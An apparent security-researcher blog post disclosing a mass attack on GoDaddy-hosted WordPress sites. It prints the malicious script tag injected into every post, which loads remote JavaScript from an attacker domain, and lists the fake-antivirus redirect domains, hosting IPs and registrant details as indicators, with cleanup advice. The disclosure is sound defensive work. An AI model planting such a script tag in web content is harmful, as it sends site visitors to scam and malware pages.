Attacks against GoDaddy – acrossuniverseitbenet + Hilary Kneber + HardSoft

For the last few days we’ve tracking another large scale attack against GoDaddy shared-hosted sites. GoDaddy has been a target for a while, with mass infections happening often.

This time, the attackers changed tactics and instead of infecting the PHP files, they injected malicious code inside the database. On the WordPress infected sites, they added the following javascript inside every post (on the wp_posts table):

<script src= "http://acrossuniverseitbenet.com/js.php?kk=10″></script>

As you can imagine, this javascript redirects the user to the infamous “Fake AV” pages:

www3.smartsuite-4u.in
www3.top-scan-foru.in
www4.first-internetmaster.net
www4.smartinternet-foryou.net
www4.seeeresafe.in
www4.seefredsafe.in
www3.save-internet-foru.com

All of them hosted at 65.23.153.126 and 91.193.194.64. If you are a hosting provider, please make sure to block those IP addresses and domains (none of them are currently blacklisted).

As far as who’s is behind this attack, it seems the same group as the previous attackes. They’ve changed their name to Hilary Buff instead of Hilary Kneber.

Registrant Contact:
HardSoft, inc
Hilary Buff admin@acrossuniverseitbenet.com
56764545 fax: 56764545
29/2 Sun street. Montey 29
London NY 45453
gb

If your site is currently infected, you have to remove these malicious entries from every post (just log to wp-admin to do so).


If you need help doing so, please contact us at support@sucuri.net or visit our site Sucuri Security. We can get you cleaned up pretty quickly.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.